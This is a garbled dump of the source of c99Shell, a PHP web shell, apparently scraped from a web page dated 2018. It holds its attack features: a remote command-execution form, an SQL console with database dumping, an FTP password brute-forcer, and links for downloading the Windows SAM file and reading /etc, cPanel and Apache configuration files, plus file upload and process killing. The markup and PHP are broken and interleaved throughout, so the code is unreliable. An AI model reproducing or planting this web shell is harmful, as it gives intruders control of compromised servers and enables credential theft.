 send to a friend by email
2018-03-22
<html class="tinyViewport tinyWidth"><head></head><body text="#ffffff" bottommargin="0" bgcolor="#000000" leftmargin="0" topmargin="0" rightmargin="0" marginheight="0" marginwidth="0"><center><b></b></center>
<font color=""yellow"">","</font>
<img src=""".$surl."act=img&img=home"" alt=""Home"" height=""20"" width=""20"" border=""0"
array(" <img="" array("<img=""><b></b><b></b><b></b><b></b>
<b></b>
<b></b>
<b></b><b></b><b>/<b></b><font color="red"></font>
<font color="white"></font><font color="green"></font>
"<table border="0"><tbody><tr><td><form name=""c999sh_sqlquery"" method="POST"><br><br><textarea name="sql_query" cols="100" rows="10"></textarea><br><br><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="query"><input type="hidden" name="sql_tbl" value=""".htmlspecialchars($sql_tbl)."""><input type="hidden" name="submit" value=""1""><input type="hidden" name=""sql_goto"" value=""".htmlspecialchars($sql_goto)."""><input type="submit" name="sql_confirm" value=""Yes""> <input type="submit" value=""No""></form></td><td valign=""top""><b></b><br>
f "» <a href=""#"" onclick=""document.c999sh_sqlquery.sql_query.value+='`".$name."`';""><b></b></a><br>
</td></tr></tbody></table><font color="red"></font><font color="green"></font><font color="red">".$v."</font><font color="green">OFF (not secure)</font><a href=""".$surl."act=phpinfo"" target=""_blank""><b><u>PHP/".phpversion()."</u></b></a><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title></title><style>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style><center><table style="BORDER-COLLAPSE: collapse" height="1" cellspacing="0" bordercolordark="#666666" cellpadding="5" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1" bordercolor="#C0C0C0"><tbody><tr><th width="101%" height="15" nowrap="" bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face="Webdings" size="6"><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>c99Shell v. <!--?php echo $shver; ?--></b></font></a><font face="Webdings" size="6"><b>!</b></font></p></th></tr><tr><td><p align="left"><!--?php echo wordwrap(php_uname(),90,"<br--></p><p align="left"><b><!--?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br--> </b></p><p align="left"><b><!--?php echo $hsafemode; ?--></b></p><p align="left"><!--?php
$d = str_replace("\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\","\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
$t = "";
$j = 0;
foreach ($e as $r)
{
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) {break;}
$j++;
}
echo "<a href="".$surl."act=ls&d=".urlencode($t)."&sort=".$sort.""--><b></b><font color="green"></font><b><font color="green"></font></b><font color="red" font="">
echo "<b></b><br><b></b><br><a href=""".$surl."act=ls&d=".urlencode($letter.":\").""".($isdiskette?"" onclick=""return" confirm('make="" sure="" that="" the="" diskette="" is="" inserted="" properly,="" otherwise="" an="" error="" may="" occur.')"":"")."="">[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "<font color="green">".$letter."</font>";}
$letters .= " ]</a> ";
}
}
if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br><a href=""".$item[1].""">".$item[0]."</a></font></p></td></tr></tbody></table><br><table style=""BORDER-COLLAPSE:" collapse"="" cellspacing="0" bordercolordark="#666666" cellpadding="5" width=""100%"" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td width=""100%"" valign=""top"">".$donated_html."</td></tr></tbody></table><br><font color="green"></font><a href=""".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9""><u>KILL</u></a><a href=""".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a""><img src=""".$surl."act=img&img=sort_desc"" height=""9"" width=""14"" border=""0""></a>";}
else {$y = "<a href=""".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d""><img src=""".$surl."act=img&img=sort_asc"" height=""9"" width=""14"" border=""0""></a>";}
if ($k > count($head)) {$k = count($head)-1;}
for($i=0;$i<count($head);$i++) {="" if="" ($i="" !="$k)" {$head[$i]="<a href=" ".$surl."act=".$dspact." &d=".urlencode($d)." &processes_sort=".$i.$parsesort[1]." "=""><b>".trim($head[$i])."</b>";}
}
$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo "</count($head);$i++)><b>".$head[$k]."</b><table style=""BORDER-COLLAPSE:" collapse"="" cellspacing="0" bordercolordark="#666666" cellpadding="5" width=""100%"" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td width=""100%"" valign=""top"">
<h3> </h3>
echo "<table style="BORDER-COLLAPSE: collapse" height="1" cellspacing="0" bordercolordark="#666666" cellpadding="5" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1" bordercolor="#C0C0C0"><tbody><tr><td width="100%" height="1" colspan="2" valign="top"><center><!--?php
if ($sql_server)
{
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_smarterror();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
}
else {$sql_sock = FALSE;}
echo "<b--><center></center>"
<center><b> </b><br>
</center></center></td></tr><tr><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li></li><li> </li><li></li></td><td width="90%" height="1" valign="top"><table height="1" cellspacing="0" cellpadding="0" width="100%" border="0"><tbody><tr><td><b></b><table><tbody><tr><td><b></b></td><td><b></b></td><td><b></b></td></tr><form action="<?php echo $surl; ?>" method="POST"></form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align="right"><input type="text" name="sql_server" value="localhost" maxlength="64" else="" {="" start="" left="" panel="" if="" (!empty($sql_db))="" ?--=""></td><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b></b></a><hr ?--=""><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><!--?php
$c = 0;
$dbs = "";
while ($row = mysql_fetch_row($result)) {$dbs .= "<option value="".$row[0]."""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= "-->
<option value=""""></option>";
</select><hr size="1" noshade=""> <hr size="1" noshade=""><input type="submit" value="Go"></form><!--?php
}
//End left panel
echo "</td--></td><td width=""100%"" height=""1"" valign=""top"
echo " <hr="" size="><center><b>.<br>" ;="" <a="" href=""".$item[1].""">
<hr size=""1"" noshade=""><b> <br>
<table border=""0" width=" "100%""="" height=""1""><tbody><tr><td><form action=""".$sql_surl.""" method=""POST""><b> "</b><br><br><textarea name=""sql_query"" cols=""100"" rows=""10""></textarea><br><br><input type=""hidden"" name=""sql_act"" value=""query""><input type=""hidden"" name=""sql_tbl"" value=""".htmlspecialchars($sql_tbl)."""><input type=""hidden"" name=""submit"" value=""1""><input type=""hidden"" name=""sql_goto" value=" "".htmlspecialchars($sql_goto)."""=""><input type=""submit"" name=""sql_confirm"" value=""Yes""> <input type=""submit"" value=""No""></form></td></tr></tbody></table>
<table border="0" width="100%" height="1"><tbody><tr><td width="30%" height="1"><b> <input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"><input type="submit" value="Create"></b></td><td width="30%" height=""><b></b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" <input="
" <b--="">:<input type=""text"" name=""sql_dump_file"" value=""".$tmp.""" size=""".(strlen($tmp)+strlen($tmp)" %="" 30).""=""><br><br>";
"<b>Download: </b><input type=""checkbox"" name=""sql_dump_download"" value=""1"" checked=""><br><br>";
<b><input type=""checkbox"" name=""sql_dump_savetofile"" value=""1"" checked="">";
echo "<br><br><input type=""submit"" name=""submit"" value=""Dump""><br><br><b><sup>1</sup></b> - , if
" "<hr size=""1"" noshade=""><center><b></b></center>";
"<a href=""".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure"">
</a><a href=""".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse"<b></a> echo " <a=""><b>
<option value=""""></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option>COUNT</option><option>AVG</option><option>SUM</option><option value="""">--------</option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><option></option><input type=""text"" name=""sql_tbl_insert[".htmlspecialchars($name)."]"" value=""".htmlspecialchars($values[$name]).""
echo " <input="" "="" {echo="" checked";}="" echo=""><b></b><input type=""radio"" name=""sql_tbl_insert_radio"" value=""2"" checked=""><b></b><input type=""hidden"" name=""sql_tbl_insert_q"" value=""".htmlspecialchars($sql_tbl_insert_q).""
" <br=""><br><input type=""submit"" value=""Confirm"
" <hr="" size="
" <img="" src=""".$surl."act=img&img=multipage"" height=""12"" width=""10"" alt=""Pages"">
"</b></a><b><a href=""".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."""><u>"
</u></a><u><a href=""".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."""><input type=""hidden"" name=""act"" value=""sql""><input type=""hidden"" name=""sql_db"" value=""".htmlspecialchars($sql_db)."""><input type=""hidden"" name=""sql_login"" value=""".htmlspecialchars($sql_login)."""><input type=""hidden"" name=""sql_passwd"" value=""".htmlspecialchars($sql_passwd)."""><input type=""hidden"" name=""sql_server"" value=""".htmlspecialchars($sql_server)."""><input type=""hidden"" name=""sql_port"" value=""".htmlspecialchars($sql_port).""" <br="">
<mysql_num_fields($result);$i++) {="" $v="mysql_field_name($result,$i);" if="" ($e[0]="=" "a")="" {$s="d" ;="" $m="asc" ;}="" else="" echo="" "<td="">";
if (empty($e[0])) {$e[0] = "a";}
if ($e[1] != $v) {echo "</mysql_num_fields($result);$i++)></a><a href=""".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."""><b>".$v."</b></a>";}
else {echo "<b>".$v."</b><a href=""".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."""><img src=""".$surl."act=img&img=sort_".$m.""" height=""9"" width=""14"" alt=""".$m."""></a>";}
echo "";
}
echo "";
echo "";
while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "";
$w = "";
$i = 0;
foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
echo "";
$i = 0;
foreach ($row as $k=>$v)
{
$v = htmlspecialchars($v);
if ($v == "") {$v = "<font color=""green"">NULL</font>";}
echo "";
$i++;
}
echo "";
echo "";
}
mysql_free_result($result);
echo "<table cellspacing="0" bordercolordark="#666666" cellpadding="5" width=""1%"" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td><input type=""checkbox"" name=""boxrow_all"" value=""1""></td><td><font color=""green""><b>Action</b></font></td></tr><tr><td><input type=""checkbox"" name=""boxrow[]"" value=""".$w."""></td><td>".$v."</td><td>";
echo "<a href=""".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE" from="" `".$sql_tbl."`="" where".$w."="" limit="" 1;").""=""><img src=""".$surl."act=img&img=sql_button_drop"" alt=""Delete"" height=""13"" width=""11"" border=""0""></a>
<a href=""".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."""><img src=""".$surl."act=img&img=change"" alt=""Edit"" height=""14"
width=" "14""="" border=""0""></a>
"</td></tr></tbody></table><hr size=""1"" noshade=""><p align=""left""><img src=""".$surl."act=img&img=arrow_ltr"" border=""0""><select name=""sql_act"">";
"<option value=""""></option>
"<option value=""deleterow"">
"</option></select><input type=""submit"" value=""Confirm""></p><p></p>
<br></u></b><b><u>";
<a href=""".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE" from="" `".$row["name"]."`").""=""><img src=""".$surl."act=img&img=sql_button_empty"" alt=""Empty"" height=""13"" width="echo" "<option="" value="</option>">";
"<option value=""tbldump""></option>";
"<option value=""tblcheck""> table</option>";
"<option value=""tbloptimize""></option>";
"<option value=""tblrepair""> table</option>";
"<option value=""tblanalyze""> table</option>";
<input type=""submit"" value=""Confirm""><p></p><p></p>
</a><table cellspacing="0" bordercolordark="#666666" cellpadding="5" width=""100%"" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td><input type=""checkbox"" name=""boxtbl_all"" value=""1""></td><td><center><b></b></center></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td></tr><tr><td><input type=""checkbox"" name=""boxtbl[]"" value=""".$row["Name"]."""></td><td><a href=""".$sql_surl."sql_tbl=".urlencode($row["Name"])."""><b>"</b><!--</td--></a></td><td>"</td><td></td><td>."</td><td>."</td><td>"</td></tr></tbody></table><table border="0" width="100%" height="1"><tbody><tr><td width="30%" height="1"><b></b><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type<="" b=""> "".htmlspecialchars($sql_newdb)
"<center><b></b><br><br>";
"<table cellspacing="0" cellpadding="0" bgcolor="#333333" bordercolorlight="#333333" border="1"><tbody><tr><td><b></b></td><td><b>V
</b></td></tr><tr><td></td><td></td></tr></tbody></table></center>
<center><b></b><br><br>
"<table cellspacing="0" cellpadding="0" bgcolor="#333333" bordercolorlight="#333333" border="1"><tbody><tr><td><b></b></td><td><b></b></td></tr><tr><td></td><td></td></tr></tbody></table>";
<b></b>
<center><b></b><br><br>
<table cellspacing="0" cellpadding="2" bgcolor="#333333" bordercolorlight="#333333" border="1"><tbody><tr><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td><td><b></b></td></tr><tr><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td></td><td><a href=""".$sql_surl."sql_act=processes&kill=".$row[0].""<u>Kill</u></a></td></tr></tbody></table> <mysql_num_fields($result);$i++) {$name=" mysql_field_name($result,$i);}"="" $f="" ;="" while="" ($row="mysql_fetch_array($result, mysql_assoc))=" "="" {$f="" .="join" ("rn",$row);}="" if="" (empty($f))="" {echo="<b="""><b></b><br><br>
</a></td></tr></tbody></table>
"</center></center></td></tr><tr><td><center><b></b></center></td></tr></tbody></table>
<b>
"<br><br>
<b></b><br>
<br>
</b>.<br>
<hr size=""1"" noshade=""><b></b><br> <br> <font color="green"><b></b></font><br>"<br><br>";
<input type="hidden" name="act" value=""ftpquickbrute""><br> <input type="text" name=""fqb_lenght"" value=""".$nixpwdperpage."""><br><br><input type=""checkbox"" name=""fqb_onlywithsh"" value=""1""><br><br><input type=""checkbox"" name=""fqb_logging"" value=""1"" checked=""><br><input type=""text"" name=""fqb_logfile"" value=""".$logfile.""" size=""".(strlen($logfile)+2*(strlen($logfile)/10))."""><br><input type=""text"" name=""fqb_logemail"" value=""".$log_email.""" size=""".(strlen($logemail)+2*(strlen($logemail)/10))."""><br><br><input type="submit" name="submit" value=""Brute""><center><b>!</b></center><b></b><table border="0" cellspacing="1" echo="" "<="" td=""><tbody><tr><td><b>Perms</b></td><td><a href="="" <b=""><font color="red"> </font><br>
"<b><font color="green">. </font></b></a><b><font color="green"><a href=""".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\repair&ft=download""><u><b>Download</b></u></a></font></b><br>"
"<b><font color="green"><a href=""".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt""><u><b></b></u></a></font></b><br>
"<b><font color="green"><a href=""".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/").""&ft=txt"><u><b>
<b><font color="green"></font></b></b></u></a><u><b><b><font color="green"><a href=""".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt""><u><b>)</b></u></a></font></b><br>
"<b><font color="green"><a href=""".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt""><u><b></b></u></a></font></b><br>
"<b><font color="green"><a href=""".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt""><u><b> </b></u></a></font></b><br>";}
"<b><font color="green"><a href=""".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt""><u><b></b></u></a></font></b><br>"
<b><font color="green"><a href=""".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt""><u><b></b></u></a></font></b><br>"<b> - </b><br>
</b>
"<script>function set_encoder_input(text) text;}</script><center><b></b></center><input type="hidden" name="act" value="encoder"><b>Input:</b><center><textarea name=""encoder_input"" id=""input"" cols="50" rows="5"></textarea><br><br><input type="submit" value=""calculate""><br><br></center><b></b>:<br><center>
- <input type="text" size="50" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" value=""".$v($encoder_input).""" readonly=""><br>
</center><b>Url:</b><center><br> <input type="text" size="35" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" value=""".urlencode($encoder_input).""" readonly="">
<br> <input type="text" size="35" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" value=""".htmlspecialchars(urldecode($encoder_input)).""" readonly="">
<br></center><b></b><center><input type="text" size="35" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" value=""".base64_encode($encoder_input).""" readonly=""></center>
"<input type="text" size="35" value=""failed"" disabled="" readonly="">
<input type="text" size="35" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" value=""".$debase64.""" id=""debase64"" readonly="">
<textarea cols=""40"" rows=""".$rows.""" onfocus=""this.select()"" onmouseover=""this.select()"" onmouseout=""this.select()"" id=""debase64"" readonly<="" textarea="</textarea"></u></font></b></td></tr></tbody></table></u></b></b></form></td></tr></tbody></table></b></textarea></u></font></b></td></tr></tbody></table></u></b></b></form></td></tr></tbody></table></b><br><br>"
"<center><b>!</b></center>"
"<form action=""><input type="name="act"" value=""><b> <br><b> sure?<br>"</b><input type="hidden" name="rndcode" value=""".$rnd."""><input type="text" name="submit"><input type="submit" value=""YES"
<center><b< b=" "="">";
}
else {echo "<input type="hidden" name="act" value="feedback"><b><br><br>Your name: <input type=""text"" name=""fdbk_name"" value=""".htmlspecialchars($fdbk_name)."""><br><br>Your e-mail: <input type=""text"" name=""fdbk_email"" value=""".htmlspecialchars($fdbk_email)."""><br><br>:<br><textarea name=""fdbk_body"" cols="80" rows="10"></textarea><input type=""hidden"" name=""fdbk_ref"" value=""".urlencode($HTTP_REFERER)."""><br><br>Attach server-info * <input type=""checkbox"" name=""fdbk_servinf"" value=""1"" checked=""><br><br><br><br>.<br><br><input type=""submit"" name=""submit"" value=""Send"">";}
<input type="hidden" name="value=<input type=" hidden"="" value=""".$dspact.""">
<b> </b><input type=""text"" name=""search_name"" size=""".round(strlen($search_name)+25).""" value=""".htmlspecialchars($search_name).""" <input="" <br=""><b> </b><input type=""text"" name=""search_in"" size=""".round(strlen($search_in)+25).""" value=""".htmlspecialchars($search_in).""">
<br><br><b></b><br><textarea name=""search_text"" cols=""122"" rows=""10"">"</textarea>
<br><br><input type=""checkbox"" name=""search_text_regexp"" value=""1"" ".($search_text_regexp="=" 1?"="" checked":"")."="">
<input type=""checkbox"" name=""search_text_wwo"" value=""1"" ".($search_text_wwo="=" 1?"="" checked":"")."="">
<input type=""checkbox"" name=""search_text_cs"" value=""1"" ".($search_text_cs="=" 1?"="" checked":"")."=""> -
<input type=""checkbox"" name=""search_text_not"" value=""1"" ".($search_text_not="=" 1?"="" checked":"")."="">
<br><br><input type="submit" name="submit" value=""Search"">"<hr size=""1"" noshade=""><b>
<b>
</b><br><b></b><input type="hidden" name="d" value=""".htmlspecialchars($d)."""><input type="hidden" name="f" value=""".htmlspecialchars($f)."""><input type="hidden" name="act" value="chmod"><table align="left" width="300" border="0" cellspacing="0" cellpadding="5"><tbody><tr><td><b>Owner</b><br><br><input type="checkbox" name="chmod_o[r]" value="1".($perms["o"]["r"]?"" checked":"")."=""><br><input type="checkbox" name="chmod_o[w]" value="1".($perms["o"]["w"]?"" checked":"")<br=""><input type="checkbox" name="chmod_o[x]" value="1".($perms["o"]["x"]?"" checked":"")."="">eXecute</td><td><b>Group</b><br><br><input type="checkbox" name="chmod_g[r]" value="1".($perms["g"]["r"]?"" }="" if="" ($act="=" "upload")="" {="" $uploadmess="" ;="" $uploadpath="str_replace("\",DIRECTORY_SEPARATOR,$uploadpath);" (empty($uploadpath))="<b"><br><b>"</b>
<input name=""uploadfile"" type=""file""><br>
Input URL: <input name=""uploadurl"" type=""text"" value=""".htmlspecialchars($uploadurl).""" size=""70""><br><br>
<input name=""uploadpath"" size=""70"" value=""".$dispd."""><br><br>
<input name="uploadfilename" size="25"><br><br>
<input type="checkbox" name="uploadautoname" value="1" id="df4"><br><br>
<input type="submit" name="submit" value=""Upload"">
<center><b< b=""></b<></center><b><br>
<br><br>
<br><textarea cols=""122"" rows=""".$rows.""" readonly=""></textarea>";
echo "<input type="hidden" name="act" value="cmd"><textarea name="cmd" cols="122" rows="10"></textarea><input type="hidden" name=""d"" value=""".$dispd."""><br><br><input type="submit" name="submit" value=""Execute"input type=" "checkbox""="" if="" ($cmd_txt)="" {echo="" "="" checked";}="" echo="">";
}
}
if ($act == "ls")
{
if (count($ls_arr) > 0) {$list = $ls_arr;}
else
{
$list = array();
if ($h = @opendir($d))
{
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
closedir($h);
}
else {}
}
if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
else
{
//Building array
$objects = array();
$vd = "f"; //Viewing mode
if ($vd == "f")
{
$objects["head"] = array();
$objects["folders"] = array();
$objects["links"] = array();
$objects["files"] = array();
foreach ($list as $v)
{
$o = basename($v);
$row = array();
if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
elseif (is_dir($v))
{
if (is_link($v)) {$type = "LINK";}
else {$type = "DIR";}
$row[] = $v;
$row[] = $type;
}
elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
$row[] = filemtime($v);
if (!$win)
{
$ow = posix_getpwuid(fileowner($v));
$gr = posix_getgrgid(filegroup($v));
$row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
}
$row[] = fileperms($v);
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
elseif (is_link($v)) {$objects["links"][] = $row;}
elseif (is_dir($v)) {$objects["folders"][] = $row;}
elseif (is_file($v)) {$objects["files"][] = $row;}
$i++;
}
$row = array();
$row[] = "<b>Name</b>";
$row[] = "<b>Size</b>";
$row[] = "<b>Modify</b>";
if (!$win)
{$row[] = "<b>Owner/Group</b>";}
$row[] = "<b>Perms</b>";
$row[] = "<b>Action</b>";
$parsesort = parsesort($sort);
$sort = $parsesort[0].$parsesort[1];
$k = $parsesort[0];
if ($parsesort[1] != "a") {$parsesort[1] = "d";}
$y = "<a href=""".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1]" =="a" ?"d":"a").""="">";
$y .= "<img src=""".$surl."act=img&img=sort_".($sort[1]" =="a" ?"asc":"desc").""="" height=""9"" width=""14"" alt=""".($parsesort[1]" ?"asc.":"desc").""="" border=""0""></a>";
$row[$k] .= $y;
for($i=0;$i<count($row)-1;$i++) {="" if="" ($i="" !="$k)" {$row[$i]="<a href=" ".$surl."act=".$dspact." &d=".urlencode($d)." &sort=".$i.$parsesort[1]." array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);="" $tab="array();" $tab["cols"]="array($row);" $tab["head"]="array();" $tab["folders"]="array();" $tab["links"]="array();" $tab["files"]="array();" $i="0;" foreach="" ($objects="" as="" $a)="" $v="$a[0];" $o="basename($v);" $dir="dirname($v);" ($disp_fullpath)="" {$disppath="$v;}" else="" $disppath="str2mini($disppath,60);" (in_array($v,$sess_data["cut"]))="" .$disppath."<="" strike=""><u><b></b><img src=""".$surl."act=img&img=small_dir"" height=""16"" width=""19"" border=""0""> <a href=""".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."""></a>
"<img src=""".$surl."act=img&img=ext_lnk"" height=""16"" width=""19"" border=""0""><a href=""".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."""></a>";
"<img src=""".$surl."act=img&img=ext_lnk"" height=""16"" width=""16"" border=""0""> <a href=""".$surl."act=ls&d=".$uv."&sort=".$sort.""</a>" ;="" }="" else="" {="" $type="DIR" $row[]="<img src=" "".$surl."act="img&img=small_dir""" height=""16"" width=""19"" border=""0"</a><a href=">[".$disppath."]</a>";
<img src="ot;" border="href=" <a="" href=""".$surl."act=chmod&f=".$uo."&d=".$ud."""><b></b>";
"<input type=""checkbox"" name=""actbox[]"" onclick=""ls_reverse_all();"">"; $i--;}
else {$checkbox = "<input type=""checkbox"" name=""actbox[]"" id=""actbox".$i.""" value=""".htmlspecialchars($v).""">";}
<a href=""".$surl."act=d&d=".$uv."""><img src=""".$surl."act=img&img=ext_diz"" alt=""Info"" height=""16"" width=""16"" border=""0""></a>
